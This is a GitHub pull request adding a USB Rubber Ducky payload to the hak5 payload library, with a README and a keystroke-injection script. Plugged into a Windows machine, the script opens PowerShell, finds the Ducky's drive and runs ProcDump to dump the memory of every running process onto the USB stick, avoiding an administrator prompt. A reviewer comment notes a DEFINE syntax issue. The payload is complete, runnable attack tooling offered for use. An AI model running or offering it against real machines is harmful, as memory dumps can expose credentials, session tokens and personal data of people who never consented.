-
Notifications
You must be signed in to change notification settings - Fork 1.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Dump Windows Memory Through ProcDump #444
Open
aleff-github
wants to merge
3
commits into
hak5:master
Choose a base branch
from
aleff-github:patch-85
base: master
Could not load branches
Branch not found: {{ refName }}
Could not load tags
Nothing to show
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from all commits
Commits
Show all changes
3 commits
Select commit
Hold shift + click to select a range
File filter
Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
There are no files selected for viewing
68 changes: 68 additions & 0 deletions
68
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,68 @@ | ||
# Dump Windows Memory Through ProcDump | ||
|
||
This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump. | ||
|
||
**Category**: Exfiltration | ||
|
||
## Table of Contents | ||
|
||
- [Dependencies](#dependencies) | ||
- [Description](#description) | ||
- [Yours TODO](#yours-todo) | ||
- [Read More](#read-more) | ||
- [Credits](#credits) | ||
|
||
## Dependencies | ||
|
||
* Authorization to execute powershell commands | ||
|
||
## Description | ||
|
||
This payload targets machines running Windows operating systems capable of executing commands via PowerShell. | ||
|
||
Its first action is to use the Rubber Ducky DETECT_READY\[3] extension to avoid unnecessary waiting times before the operating system is ready. | ||
|
||
Once the OS is active, the payload opens a PowerShell shell without administrator privileges and identifies the name assigned to the Rubber Ducky by combining Windows' Get-Volume and DriveLetter commands. | ||
|
||
Subsequently, to avoid requests for administrative permissions during the memory dumping operation with ProcDump, the payload directly moves to the Rubber Ducky, where it executes ProcDump, allowing the output to be stored directly on the USB drive without the need for additional permissions. | ||
|
||
To avoid potential complications related to exception handling during the execution of ProcDump, the payload uses the PID number instead of the process name. | ||
|
||
To obtain all active process PIDs the tasklist command is used, which provides this information comprehensively. | ||
|
||
## Yours TODO | ||
|
||
1. Download ProcDump\[5]. | ||
2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory. | ||
3. Then you have to change the variable `$WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`. | ||
4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `$PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`. | ||
|
||
## Read More | ||
|
||
- \[1] [ProcDump Documentation](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) | ||
- \[2] [How to collect memory dumps using ProcDump](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB0253710) | ||
- \[3] [DETECT READY - SMARTER INITIAL DELAYS FOR KEYSTROKE INJECTION ATTACKS WITH THE USB RUBBER DUCKY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready) | ||
- \[4] [Physical Medium Exfiltration](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration) | ||
- \[5] [Download ProcDump for Windows target](https://download.sysinternals.com/files/Procdump.zip) | ||
|
||
## Credits | ||
|
||
<h2 align="center"> Aleff :octocat: </h2> | ||
<div align=center> | ||
<table> | ||
<tr> | ||
<td align="center" width="96"> | ||
<a href="https://github.com/aleff-github"> | ||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" /> | ||
</a> | ||
<br>Github | ||
</td> | ||
<td align="center" width="96"> | ||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> | ||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> | ||
</a> | ||
<br>Linkedin | ||
</td> | ||
</tr> | ||
</table> | ||
</div> |
73 changes: 73 additions & 0 deletions
73
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,73 @@ | ||
REM ######################################################## | ||
REM # # | ||
REM # Title : Dump Windows Memory Through ProcDump # | ||
REM # Author : Aleff # | ||
REM # Version : 1.0 # | ||
REM # Category : Exfiltration # | ||
REM # Target : Windows # | ||
REM # # | ||
REM ######################################################## | ||
|
||
|
||
REM Requirements: | ||
REM - Authorization to execute powershell commands | ||
|
||
|
||
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe | ||
DEFINE $WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a | ||
|
||
REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\' | ||
DEFINE $PATH_TO_EXE \ProcDump\Procdump\ | ||
|
||
REM Driver Label of your RubberDucky - Default: DUCKY | ||
DEFINE #DUCKY_DRIVE_LABEL DUCKY | ||
|
||
|
||
EXTENSION DETECT_READY | ||
REM VERSION 1.1 | ||
REM AUTHOR: Korben | ||
|
||
REM_BLOCK DOCUMENTATION | ||
USAGE: | ||
Extension runs inline (here) | ||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic | ||
boot delay | ||
|
||
TARGETS: | ||
Any system that reflects CAPSLOCK will detect minimum required delay | ||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms | ||
END_REM | ||
|
||
REM CONFIGURATION: | ||
DEFINE #RESPONSE_DELAY 25 | ||
DEFINE #ITERATION_LIMIT 120 | ||
|
||
VAR $C = 0 | ||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) | ||
CAPSLOCK | ||
DELAY #RESPONSE_DELAY | ||
$C = ($C + 1) | ||
END_WHILE | ||
CAPSLOCK | ||
END_EXTENSION | ||
|
||
GUI r | ||
DELAY 2000 | ||
|
||
STRING powershell | ||
ENTER | ||
DELAY 2000 | ||
|
||
STRINGLN_POWERSHELL | ||
$m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter; | ||
$m+=":"; | ||
cd "$m\\"; | ||
$a=tasklist /FI "Status eq Running" /FO LIST; | ||
foreach ($i in $a){ | ||
if ( $i -like '*PID*'){ | ||
$i -match 'PID.\s+(.+)'; | ||
".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1]; | ||
} | ||
} | ||
exit; | ||
END_STRINGLN |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You need to use a
#
for define.$
is used for variables.and